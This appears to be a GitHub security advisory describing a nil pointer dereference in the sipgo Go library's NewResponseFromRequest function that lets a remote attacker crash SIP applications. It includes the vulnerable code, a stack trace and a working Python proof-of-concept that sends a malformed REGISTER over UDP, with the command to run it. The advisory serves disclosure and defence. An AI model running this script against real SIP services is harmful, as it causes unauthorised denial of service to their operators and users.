"details": "### Description\n\nA nil pointer dereference vulnerability was discovered in the SIPGO library's `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.\n\nThe vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.\n\n> Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function.\n\n### Technical details\n\nThe vulnerability is located in `/sip/response.go` at line 242 in the `NewResponseFromRequest` function:\n\n```go\nif _, ok := res.To().Params[\"tag\"]; !ok {\n uuid, _ := uuid.NewRandom()\n res.to.Params[\"tag\"] = uuid.String()\n}\n```\n\n**Root Cause:**\n\n1. **Missing To Header**: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.\n\n2. **Header Copying Logic**: During response creation in `NewResponseFromRequest`, the code attempts to copy headers from the request to the response. Since there's no To header in the request, no To header is copied to the response.\n\n3. **Unsafe Assumption**: The response creation code assumes the To header exists and calls `res.To().Params[\"tag\"]` without checking if `res.To()` returns `nil`, causing a nil pointer dereference.\n\n**Stack Trace:**\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]\n\ngoroutine 175 [running]:\ngithub.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})\n /Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394\n```\n\n### Impact\n\nThis vulnerability affects **all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses**.\n\n**Attack Impact:**\n- **Availability**: Complete denial of service - application crashes immediately\n- **Remote Exploitation**: Yes\n- **Authentication Required**: No - vulnerability triggers during initial response generation which does not require authentication\n\n\n### How to reproduce the issue\n\nTo reproduce this issue, you need:\n\n1. A SIP application using the vulnerable sipgo library\n2. Network access to send SIP messages to the target\n\nSteps:\n\n1. Save the following Python script as `sipgo-response-dos.py`:\n\n ```python\n #!/usr/bin/env python3\n import socket\n import sys\n import time\n import random\n\n def create_malformed_register(target_ip, target_port):\n call_id = f\"sipgo-dos-{int(time.time())}\"\n tag = f\"sipgo-dos-{random.randint(1000, 9999)}\"\n branch = f\"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}\"\n \n # Craft malformed SIP request without To header\n sip_message = (\n f\"REGISTER sip:{target_ip}:{target_port} SIP/2.0\\r\\n\"\n f\"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\\r\\n\"\n f\"From: <sip:
[email protected]>;tag={tag}\\r\\n\"\n f\"Call-ID: {call_id}\\r\\n\"\n f\"CSeq: 1 REGISTER\\r\\n\"\n f\"Contact: <sip:
[email protected]:5060>\\r\\n\"\n f\"Content-Length: 0\\r\\n\"\n f\"\\r\\n\"\n )\n return sip_message\n\n if __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage: python3 sipgo-response-dos.py <target_ip> <target_port>\")\n sys.exit(1)\n \n target_ip = sys.argv[1]\n target_port = int(sys.argv[2])\n \n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n payload = create_malformed_register(target_ip, target_port)\n \n print(f\"Sending malformed REGISTER to {target_ip}:{target_port}\")\n sock.sendto(payload.encode('utf-8'), (target_ip, target_port))\n print(\"Exploit sent - target should crash immediately\")\n ```\n\n\n2. Run the script against a vulnerable sipgo application:\n\n ```bash\n python3 sipgo-response-dos.py <target_ip> <target_port>\n ```\n\n3. Observe that the target application crashes with a SIGSEGV panic.\n\n> Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments